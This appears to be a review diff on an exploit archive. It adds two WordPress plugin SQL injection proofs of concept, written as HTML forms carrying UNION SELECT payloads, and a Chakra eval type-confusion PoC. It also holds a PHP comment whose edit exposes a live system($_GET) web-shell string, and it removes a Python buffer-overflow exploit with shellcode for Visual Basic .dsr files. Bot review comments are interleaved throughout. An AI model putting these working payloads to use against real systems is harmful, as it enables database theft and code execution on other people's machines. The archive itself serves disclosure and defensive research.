http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/
2 - Proof of Concept
<form method="post" action="http://localhost:1406/wp/wp-content/plugins/answer-my-question/modal.php">
<input type="text" name="id" value="0 UNION SELECT 1,2,3,4,5,6,slug,term_group,name,10,11,12 FROM wp_terms WHERE term_id=1">
<input type="submit" value="Send">
</form>
3. Solution
--
Atenciosamente
Lenon Leite
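
Review bot: section "3. Solution" is empty, so the advisory names no fixed version or mitigation, unlike the Sirv entry added in the same commit, which points to 1.3.2. Either state that no fix was available at publication or give the remediation (the description implies the id parameter needs integer casting or a prepared statement). Two smaller points: the section numbering mixes "1 -" and "3.", and "Date: 10/11/2016" is ambiguous next to the CSV date 2016-11-17, so an ISO date would be clearer.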

platforms/php/webapps/40772.txt Executable file

@ -0,0 +1,37 @@
# Exploit Title: Sirv 1.3.1 Plugin For WordPress Sql Injection
# Date: 10/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/sirv/
# Software Link: https://wordpress.org/plugins/sirv/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 1.3.1
# Tested on: Windows 8.1
1 - Description
$_POST[ id ] is not escaped. sirv_get_row_by_id() is accessible for every
registered user.
http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
2. Proof of Concept
Login as regular user.
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="sirv_get_row_by_id">
<input type="submit" value="Send">
</form>
3. Solution:
Update to version 1.3.2
--
Atenciosamente
Lenon Leite
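
Review bot: the description says "$_POST[ id ]" is not escaped, but the request in section 2 sends the value in a field named row_id, so the write-up and the proof of concept disagree on which parameter reaches the query. Correct whichever is wrong so that defenders writing a filter or auditing sirv_get_row_by_id() look at the right input. The section numbering also switches from "1 -" to "2." and "3." within the file.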

@ -65,7 +65,7 @@
408. for example:
409. User <?php echo system($_GET['cwd']); ?>: login failed! <== oops! ;)
410. will be replaced by:
411. User &lt;?php echo system($_GET[&#039;cwd&#039;]); ?&gt;: login failed!
411. User <?php echo system($_GET[&#039;cwd&#039;]); ?>: login failed!
*/
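
Review bot: the second of the two 411 lines (the replacement, going by diff order) decodes &lt; and &gt; back to literal angle brackets while leaving &#039; encoded, so the "will be replaced by" example now shows a live PHP open tag, which is exactly what the comment says gets neutralised. This looks like an accidental partial entity decode; keep the fully encoded form from the first 411 line.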

@ -0,0 +1,17 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=948
In Chakra, function calls can sometimes take an extra internal argument, using the flag CallFlags_ExtraArg. The global eval function makes assumptions about the type of this extra arg, and casts it to a FrameDisplay object. If eval is called from a location in code where an extra parameter is added, for example, a Proxy function trap, and the extra parameter is of a different type, this can lead to type confusion. A full PoC is as follows and attached:
var p = new Proxy(eval, {});
p("alert(\"e\")");
-->
<html>
<body>
<script>
var p = new Proxy(eval, {});
p("alert(\"e\")");
</script>
</body>
</html>
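
Review bot: the header comment gives the Project Zero issue link and the root cause but no affected Edge or Chakra build and no fix reference, and the same two-line PoC appears both in the comment and in the script body. Add the tested version and any advisory identifier from the source issue to the comment so the entry can be matched to a patch level.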

@ -1,111 +0,0 @@
#usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)
dsrfile = (
"VERSION 5.00\n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
" ClientHeight = 6315\n"
" ClientLeft = 0\n"
" ClientTop = 0\n"
" ClientWidth = 7980\n"
" _ExtentX = 14076\n"
" _ExtentY = 11139\n"
" FolderFlags = 1\n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
" TypeInfoCookie = 0\n"
" Version = 4\n"
" NumConnections = 1\n"
" BeginProperty Connection1\n"
' ConnectionName = "Connection1"\n'
" ConnDispId = 1001\n"
" SourceOfData = 3\n"
' ConnectionSource= ""\n'
" Expanded = -1 'True\n"
" QuoteChar = 96\n"
" SeparatorChar = 46\n"
" EndProperty\n"
" NumRecordsets = 1\n"
" BeginProperty Recordset1\n"
' CommandName = "Command1"\n'
" CommDispId = 1002\n"
" RsDispId = 1003\n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n'
' ActiveConnectionName= "Connection1"\n'
" CommandType = 2\n"
" dbObjectType = 1\n"
" Locktype = 3\n"
" IsRSReturning = -1 'True\n"
" NumFields = 1\n"
" BeginProperty Field1\n"
" Precision = 10\n"
" Size = 4\n"
" Scale = 0\n"
" Type = 3\n"
' Name = "ID"\n'
' Caption = "ID"\n'
" EndProperty\n"
" NumGroups = 0\n"
" ParamCount = 0\n"
" RelationCount = 0\n"
" AggregateCount = 0\n"
" EndProperty\n"
"End\n"
'Attribute VB_Name = "DataEnvironment1"\n'
"Attribute VB_GlobalNameSpace = False\n"
"Attribute VB_Creatable = True\n"
"Attribute VB_PredeclaredId = True\n"
"Attribute VB_Exposed = False\n"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
# milw0rm.com [2008-04-04]